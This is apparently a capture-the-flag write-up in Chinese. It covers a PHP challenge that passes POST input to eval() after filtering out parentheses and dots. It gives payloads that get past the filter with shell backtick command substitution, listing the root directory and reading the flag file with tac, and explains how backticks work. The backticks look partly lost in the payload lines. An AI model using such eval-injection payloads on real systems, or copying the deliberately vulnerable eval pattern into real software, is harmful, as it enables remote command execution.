RCE极限挑战-1

源码

<?php

error_reporting(0);
highlight_file(__FILE__);

$code = $_POST['code'];

$code = str_replace("(","括号",$code);

$code = str_replace(".","点",$code);

eval($code);

?>

payload：code=echols /;
code=echotac /f1agaaa;
获得flag
反引号（）在 Unix/Linux 系统中的 Shell（如 Bash）中有特殊的作用。它用于命令替换，即将反引号中的命令执行并将其输出替换回命令本身的位置。 tac /f1agaaa 是一个命令。tac 是 cat 命令的反向操作，它会将文件的内容按行反向输出（从最后一行到第一行）。因此，tac /f1agaaa 会将 /f1agaaa 文件的内容按行反转并输出。 反引号 ` 包围着 tac /f1agaaa，意味着执行该命令，并将其输出替换为 echo 命令的参数。